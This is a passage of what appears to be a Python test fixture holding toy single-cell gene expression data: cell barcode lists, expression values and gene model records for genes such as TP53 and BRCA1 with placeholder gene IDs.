"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TLR2 Expression": {
"name": "TLR2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.58,
1.58,
2.58,
2.81,
1.0,
3.0,
2.58,
1.0,
2.81,
2.58,
1.0,
2.81,
1.58,
2.32,
1.58,
1.58,
1.58,
2.58,
2.0,
2.32,
2.81,
2.81,
2.32,
1.58,
2.81,
2.32,
2.32,
1.0,
1.58,
2.58,
1.58,
2.32,
1.58,
1.58,
2.81,
1.58,
3.0,
2.0,
1.58,
1.0,
3.0,
2.0,
2.81,
2.81,
3.0,
3.0,
2.32,
2.81,
2.0,
2.32,
2.58,
2.81,
2.81,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CTLA4 Cells": {
"name": "CTLA4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CTLA4 Expression": {
"name": "CTLA4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.32,
2.0,
2.81,
1.58,
2.32,
2.32,
2.0,
2.32,
2.0,
2.32,
1.0,
3.0,
2.81,
1.0,
3.0,
1.0,
3.0,
3.0,
1.0,
3.0,
1.0,
3.0,
1.0,
3.0,
2.81,
2.32,
2.32,
1.58,
3.0,
3.0,
1.58,
2.32,
2.81,
1.58,
2.32,
1.58,
2.81,
2.81,
2.0,
2.81,
1.58,
2.81,
2.32,
1.0,
1.58,
2.81,
2.81,
2.58,
3.0,
2.0,
3.0,
2.58,
2.0,
3.0,
1.0,
3.0,
1.58,
2.32,
2.32,
2.32,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"F5 Cells": {
"name": "F5 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"F5 Expression": {
"name": "F5 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.58,
2.0,
3.0,
2.58,
3.0,
1.58,
2.58,
2.0,
1.0,
1.0,
2.32,
1.58,
3.0,
2.0,
2.0,
1.0,
3.0,
1.58,
2.81,
2.0,
2.0,
1.58,
2.81,
1.58,
1.0,
2.58,
2.58,
2.81,
3.0,
2.0,
2.81,
3.0,
3.0,
2.0,
1.0,
3.0,
1.0,
2.32,
2.0,
2.58,
1.0,
2.81,
1.0,
2.81,
3.0,
1.58,
3.0,
2.32,
2.58,
3.0,
2.58,
2.58,
2.0,
2.0,
1.0,
2.58,
2.58,
2.81,
3.0,
2.0,
2.32,
2.81,
1.58,
1.0,
2.58,
2.58,
1.58,
3.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-DQB1 Cells": {
"name": "HLA-DQB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-DQB1 Expression": {
"name": "HLA-DQB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.0,
1.0,
3.0,
3.0,
2.0,
2.58,
2.32,
2.81,
3.0,
2.81,
2.0,
3.0,
2.32,
2.81,
2.32,
2.81,
3.0,
2.0,
2.81,
2.58,
2.0,
2.81,
1.0,
2.58,
2.0,
2.32,
2.81,
3.0,
3.0,
2.58,
2.81,
2.32,
2.32,
2.0,
2.58,
1.58,
2.0,
2.58,
3.0,
2.32,
2.32,
2.0,
2.0,
2.0,
1.0,
2.81,
2.58,
2.81,
2.0,
1.58,
1.58,
1.0,
2.32,
2.58,
2.32,
2.81,
2.0,
3.0,
2.32,
1.0,
1.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HFE Cells": {
"name": "HFE Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HFE Expression": {
"name": "HFE Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
1.58,
3.0,
3.0,
2.0,
2.0,
2.32,
2.81,
2.81,
1.0,
2.58,
2.0,
1.0,
3.0,
2.0,
1.58,
2.32,
2.32,
3.0,
2.58,
2.81,
2.58,
1.0,
3.0,
2.81,
1.58,
2.58,
1.58,
3.0,
1.58,
3.0,
2.0,
1.0,
2.32,
1.58,
1.0,
1.58,
2.58,
2.58,
1.58,
1.58,
2.32,
1.0,
1.0,
2.0,
2.81,
2.32,
2.58,
2.32,
2.0,
2.81,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
},
"gene_models": {
"TP53": {
"name": "TP53",
"searchable_name": "tp53",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE000",
},
"EGFR": {
"name": "EGFR",
"searchable_name": "egfr",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE001",
},
"TNF": {
"name": "TNF",
"searchable_name": "tnf",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE002",
},
"APOE": {
"name": "APOE",
"searchable_name": "apoe",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE003",
},
"VEGFA": {
"name": "VEGFA",
"searchable_name": "vegfa",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE004",
},
"IL6": {
"name": "IL6",
"searchable_name": "il6",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE005",
},
"MTHFR": {
"name": "MTHFR",
"searchable_name": "mthfr",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE006",
},
"TGFB1": {
"name": "TGFB1",
"searchable_name": "tgfb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE007",
},
"ERBB2": {
"name": "ERBB2",
"searchable_name": "erbb2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE008",
},
"ESR1": {
"name": "ESR1",
"searchable_name": "esr1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE009",
},
"ACE": {
"name": "ACE",
"searchable_name": "ace",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0010",
},
"IL10": {
"name": "IL10",
"searchable_name": "il10",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0011",
},
"HIF1A": {
"name": "HIF1A",
"searchable_name": "hif1a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0012",
},
"APP": {
"name": "APP",
"searchable_name": "app",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0013",
},
"BRCA1": {
"name": "BRCA1",
"searchable_name": "brca1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0014",
},
"MMP9": {
"name": "MMP9",
"searchable_name": "mmp9",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0015",
},
"HLA-DRB1": {
"name": "HLA-DRB1",
"searchable_name": "hla-drb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0016",
},
"ADIPOQ": {
"name": "ADIPOQ",
"searchable_name": "adipoq",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0017",
},
"ABCB1": {
"name": "ABCB1",
"searchable_name": "abcb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0018",
},
"LOC110806262": {
"name": "LOC110806262",
"searchable_name": "loc110806262",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0019",
},
"NFKB1": {
"name": "NFKB1",
"searchable_name": "nfkb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0020",
},
"AKT1": {
"name": "AKT1",
"searchable_name": "akt1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0021",
},
"CRP": {
"name": "CRP",
"searchable_name": "crp",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0022",
},
"AR": {
"name": "AR",
"searchable_name": "ar",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0023",
},
"BDNF": {
"name": "BDNF",
"searchable_name": "bdnf",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0024",
},
"BRAF": {
"name": "BRAF",
"searchable_name": "braf",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0025",
},
"STAT3": {
"name": "STAT3",
"searchable_name": "stat3",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0026",
},
"KRAS": {
"name": "KRAS",
"searchable_name": "kras",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0027",
},
"CDKN2A": {
"name": "CDKN2A",
"searchable_name": "cdkn2a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0028",
},
"PTGS2": {
"name": "PTGS2",
"searchable_name": "ptgs2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0029",
},
"IL1B": {
"name": "IL1B",
"searchable_name": "il1b",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0030",
},
"VDR": {
"name": "VDR",
"searchable_name": "vdr",
